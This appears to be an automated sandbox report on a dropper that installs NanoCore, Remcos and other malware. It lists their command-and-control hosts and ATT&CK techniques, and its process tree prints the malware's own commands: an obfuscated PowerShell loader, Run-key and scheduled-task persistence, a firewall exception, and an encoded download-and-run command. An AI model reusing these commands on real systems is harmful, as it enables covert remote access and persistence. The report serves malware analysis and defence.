nanocore | 393732bdd7df3cbbcc35dca3397178466f32de8ebd266ad5791c000288771bc5

Analysis

max time kernel
3s
max time network
93s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08-09-2024 14:35

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

driverupdate_report_windows_10_22h2.txt.exe
Size

13.8MB
MD5

8360a6245b4ae84a5b6e4784d7802472
SHA1

192f6d4a68ec867c5919a5d5fd4c782bf9c39127
SHA256

393732bdd7df3cbbcc35dca3397178466f32de8ebd266ad5791c000288771bc5
SHA512

38b4630ab40c84f822fe860038c4c48d0ea31ceaa23d05d01f599c08f44a3fe45113f4386f1874799dfb15e7d7930c369c2eeba11129adfa3f9154264cbcc63b
SSDEEP

49152:M3QhanbDdeZ6Hfa/nkNQzlJ7r5oP3TXyymMknH76EAaIilSH7YNjMn80iA+cpUGN:Mn

Score

10^/10

nanocore remcos august crypter toolz grace stub sup defense_evasion discovery evasion execution keylogger rat spyware stealer trojan upx

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

hiatus2.ddns.net:1604

127.0.0.1:1604

Mutex

e7e30201-c342-4921-abc6-2182083982ff

Attributes

activate_away_mode
true
backup_connection_host
127.0.0.1
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2024-05-31T20:09:09.303717636Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
1604
default_group
Default
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
e7e30201-c342-4921-abc6-2182083982ff
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
hiatus2.ddns.net
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
true
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Extracted

Family

remcos

Botnet

AUGUST CRYPTER TOOLZ GRACE STUB

teamfavour222.ddns.net :6767

odogwuvisual123.duckdns.org:6767

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
-YFLE4M
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

remcos

Botnet

Sup

deadyh2849ijest.duckdns.org:8347

deadyh2849ijest.duckdns.org:37830

highestlotto.duckdns.org:37830

highestlotto.duckdns.org:8347

highest1lotto1.duckdns.org:8347

highest1lotto1.duckdns.org:37830

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
lairup.dat
keylog_flag
false
keylog_path
%AppData%
mouse_option
false
mutex
gbopertj-7FGJEG
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4348	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	driverupdate_report_windows_10_22h2.txt.exe

Executes dropped EXE 12 IoCs

pid	Process
3144	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
2744	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
4408	BlueScreen.exe
1460	CirnoBackdoorLOL.exe
1452	~DeBA86.tmp
4764	172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
4840	cleansaturn.exe
3984	error.exe
1948	concos_1.6.exe
1412	colorful screen darkener.exe
4304	Client.exe
2028	levislocker.exe

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000e00000002342e-28.dat	upx
behavioral2/memory/4408-35-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral2/files/0x00080000000234f1-53.dat	upx
behavioral2/memory/4764-59-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral2/files/0x000b000000023491-84.dat	upx
behavioral2/memory/3984-109-0x0000000000400000-0x000000000040D000-memory.dmp	upx
behavioral2/memory/4764-250-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral2/memory/4408-266-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral2/memory/4764-269-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral2/memory/4764-280-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral2/memory/4764-375-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral2/memory/4764-443-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral2/memory/4764-524-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral2/memory/4764-621-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral2/memory/4764-711-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral2/memory/4764-800-0x0000000000400000-0x000000000048A000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
73	drive.google.com
45	discord.com
48	discord.com
71	drive.google.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4792	Powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	levislocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	~DeBA86.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	error.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverupdate_report_windows_10_22h2.txt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BlueScreen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CirnoBackdoorLOL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	concos_1.6.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1636	timeout.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
872	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4392	schtasks.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4304	Client.exe

Suspicious use of WriteProcessMemory 41 IoCs

description	pid	Process	procid_target
PID 4008 wrote to memory of 3144	4008	driverupdate_report_windows_10_22h2.txt.exe	86
PID 4008 wrote to memory of 3144	4008	driverupdate_report_windows_10_22h2.txt.exe	86
PID 4008 wrote to memory of 3144	4008	driverupdate_report_windows_10_22h2.txt.exe	86
PID 4008 wrote to memory of 2744	4008	driverupdate_report_windows_10_22h2.txt.exe	87
PID 4008 wrote to memory of 2744	4008	driverupdate_report_windows_10_22h2.txt.exe	87
PID 4008 wrote to memory of 2744	4008	driverupdate_report_windows_10_22h2.txt.exe	87
PID 4008 wrote to memory of 4408	4008	driverupdate_report_windows_10_22h2.txt.exe	88
PID 4008 wrote to memory of 4408	4008	driverupdate_report_windows_10_22h2.txt.exe	88
PID 4008 wrote to memory of 4408	4008	driverupdate_report_windows_10_22h2.txt.exe	88
PID 4008 wrote to memory of 1460	4008	driverupdate_report_windows_10_22h2.txt.exe	89
PID 4008 wrote to memory of 1460	4008	driverupdate_report_windows_10_22h2.txt.exe	89
PID 4008 wrote to memory of 1460	4008	driverupdate_report_windows_10_22h2.txt.exe	89
PID 1460 wrote to memory of 1452	1460	CirnoBackdoorLOL.exe	90
PID 1460 wrote to memory of 1452	1460	CirnoBackdoorLOL.exe	90
PID 1460 wrote to memory of 1452	1460	CirnoBackdoorLOL.exe	90
PID 4008 wrote to memory of 4764	4008	driverupdate_report_windows_10_22h2.txt.exe	91
PID 4008 wrote to memory of 4764	4008	driverupdate_report_windows_10_22h2.txt.exe	91
PID 4008 wrote to memory of 4764	4008	driverupdate_report_windows_10_22h2.txt.exe	91
PID 2744 wrote to memory of 4792	2744	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe	92
PID 2744 wrote to memory of 4792	2744	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe	92
PID 2744 wrote to memory of 4792	2744	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe	92
PID 4008 wrote to memory of 4840	4008	driverupdate_report_windows_10_22h2.txt.exe	94
PID 4008 wrote to memory of 4840	4008	driverupdate_report_windows_10_22h2.txt.exe	94
PID 4008 wrote to memory of 4840	4008	driverupdate_report_windows_10_22h2.txt.exe	94
PID 4008 wrote to memory of 3984	4008	driverupdate_report_windows_10_22h2.txt.exe	96
PID 4008 wrote to memory of 3984	4008	driverupdate_report_windows_10_22h2.txt.exe	96
PID 4008 wrote to memory of 3984	4008	driverupdate_report_windows_10_22h2.txt.exe	96
PID 4008 wrote to memory of 1948	4008	driverupdate_report_windows_10_22h2.txt.exe	97
PID 4008 wrote to memory of 1948	4008	driverupdate_report_windows_10_22h2.txt.exe	97
PID 4008 wrote to memory of 1948	4008	driverupdate_report_windows_10_22h2.txt.exe	97
PID 4008 wrote to memory of 1412	4008	driverupdate_report_windows_10_22h2.txt.exe	98
PID 4008 wrote to memory of 1412	4008	driverupdate_report_windows_10_22h2.txt.exe	98
PID 4008 wrote to memory of 1412	4008	driverupdate_report_windows_10_22h2.txt.exe	98
PID 4008 wrote to memory of 4304	4008	driverupdate_report_windows_10_22h2.txt.exe	100
PID 4008 wrote to memory of 4304	4008	driverupdate_report_windows_10_22h2.txt.exe	100
PID 4008 wrote to memory of 2028	4008	driverupdate_report_windows_10_22h2.txt.exe	101
PID 4008 wrote to memory of 2028	4008	driverupdate_report_windows_10_22h2.txt.exe	101
PID 4008 wrote to memory of 2028	4008	driverupdate_report_windows_10_22h2.txt.exe	101
PID 4008 wrote to memory of 3936	4008	driverupdate_report_windows_10_22h2.txt.exe	102
PID 4008 wrote to memory of 3936	4008	driverupdate_report_windows_10_22h2.txt.exe	102
PID 4008 wrote to memory of 3936	4008	driverupdate_report_windows_10_22h2.txt.exe	102

C:\Users\Admin\AppData\Local\Temp\driverupdate_report_windows_10_22h2.txt.exe
"C:\Users\Admin\AppData\Local\Temp\driverupdate_report_windows_10_22h2.txt.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4008
- C:\Users\Admin\AppData\Local\Temp\7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3144
- C:\Users\Admin\AppData\Local\Temp\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
  "C:\Users\Admin\AppData\Local\Temp\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2744
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    "Powershell.exe" -windowstyle minimized "$Teratism249 = Get-Content 'C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168' ; $Neglefilen=$Teratism249.SubString(69482,3);.$Neglefilen($Teratism249) "
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    PID:4792
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      PID:4416
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Archcharlatan" /t REG_EXPAND_SZ /d "%Gibblegabbler52% -windowstyle minimized $Loveability=(Get-ItemProperty -Path 'HKCU:\Torturredskabet\').Vandskien;%Gibblegabbler52% ($Loveability)"
        5⤵
        
        PID:3684
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Archcharlatan" /t REG_EXPAND_SZ /d "%Gibblegabbler52% -windowstyle minimized $Loveability=(Get-ItemProperty -Path 'HKCU:\Torturredskabet\').Vandskien;%Gibblegabbler52% ($Loveability)"
        6⤵
        Modifies registry key
        
        PID:872
- C:\Users\Admin\AppData\Local\Temp\BlueScreen.exe
  "C:\Users\Admin\AppData\Local\Temp\BlueScreen.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4408
- C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe
  "C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Users\Admin\AppData\Local\Temp\~DeBA86.tmp
    C:\Users\Admin\AppData\Local\Temp\~DeBA86.tmp _$PID:308 _$EXE:C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe _$CMDLINE:
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1452
  - - C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe
      C:\Users\Admin\AppData\Local\Temp\\CirnoBackdoorLOL.exe
      4⤵
      PID:3968
  - - C:\Users\Admin\AppData\Local\Temp\javawvd.exe
      C:\Users\Admin\AppData\Local\Temp\javawvd.exe
      4⤵
      PID:4736
- C:\Users\Admin\AppData\Local\Temp\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
  "C:\Users\Admin\AppData\Local\Temp\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4764
- C:\Users\Admin\AppData\Local\Temp\cleansaturn.exe
  "C:\Users\Admin\AppData\Local\Temp\cleansaturn.exe"
  2⤵
  - Executes dropped EXE
  PID:4840
- C:\Users\Admin\AppData\Local\Temp\error.exe
  "C:\Users\Admin\AppData\Local\Temp\error.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3984
- C:\Users\Admin\AppData\Local\Temp\concos_1.6.exe
  "C:\Users\Admin\AppData\Local\Temp\concos_1.6.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1948
- C:\Users\Admin\AppData\Local\Temp\colorful screen darkener.exe
  "C:\Users\Admin\AppData\Local\Temp\colorful screen darkener.exe"
  2⤵
  - Executes dropped EXE
  PID:1412
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4304
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit
    3⤵
    PID:3608
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4392
- C:\Users\Admin\AppData\Local\Temp\levislocker.exe
  "C:\Users\Admin\AppData\Local\Temp\levislocker.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2028
- C:\Users\Admin\AppData\Local\Temp\malecus.exe
  "C:\Users\Admin\AppData\Local\Temp\malecus.exe"
  2⤵
  PID:3936
- C:\Users\Admin\AppData\Local\Temp\evil.exe
  "C:\Users\Admin\AppData\Local\Temp\evil.exe"
  2⤵
  PID:1160
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\evil.exe" "evil.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:4348
- C:\Users\Admin\AppData\Local\Temp\Solaris.exe
  "C:\Users\Admin\AppData\Local\Temp\Solaris.exe"
  2⤵
  PID:1176
- C:\Users\Admin\AppData\Local\Temp\TEST.exe
  "C:\Users\Admin\AppData\Local\Temp\TEST.exe"
  2⤵
  PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2E6E.tmp.bat""
    3⤵
    PID:1868
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1636
  - - C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe
      "C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe"
      4⤵
      PID:4100
- C:\Users\Admin\AppData\Local\Temp\ss.exe
  "C:\Users\Admin\AppData\Local\Temp\ss.exe"
  2⤵
  PID:3676
- C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe
  "C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe"
  2⤵
  PID:116
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAYQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQBqAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBzAHcAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAHAAZABiACcALAAgADwAIwB4AG4AaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAZgB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAdQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFkAbwB1AHQAdQBiAGUALQBWAGkAZQB3AGUAcgBzAC4AcABkAGIAJwApACkAPAAjAGYAdABsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAHgAbQBsACcALAAgADwAIwBhAGsAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAagBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAegBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AeABtAGwAJwApACkAPAAjAHEAYwByACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAGQAbABsACcALAAgADwAIwB2AHgAdgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAZQBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAdQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AZABsAGwAJwApACkAPAAjAGEAaABiACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlAC4AYwBvAG4AZgBpAGcAJwAsACAAPAAjAGoAZgB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwBhAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBwAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAuAGMAbwBuAGYAaQBnACcAKQApADwAIwB0AHoAYwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwBsAC8AWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACwAIAA8ACMAZQBrAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHMAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AGgAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlACcAKQApADwAIwBxAGYAaQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcALAAgADwAIwBmAHQAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHAAdgB5ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGQAYQBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwApACkAPAAjAHEAYgB4ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAC8AVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACwAIAA8ACMAcQB0AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAGUAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAG4AcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQApADwAIwBjAHQAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB5AGIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgB4AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACkAPAAjAHoAegBjACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAdAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAHYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAZwBjAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegB5AHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAeAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwApADwAIwBnAHUAZwAjAD4A"
    3⤵
    PID:4684
  - - C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe
      "C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe"
      4⤵
      PID:544
  - - C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe
      "C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe"
      4⤵
      PID:3964
  - - C:\Users\Admin\AppData\Roaming\VC_redistx64.exe
      "C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"
      4⤵
      PID:2616

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f4 0x4e0
1⤵
PID:1620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

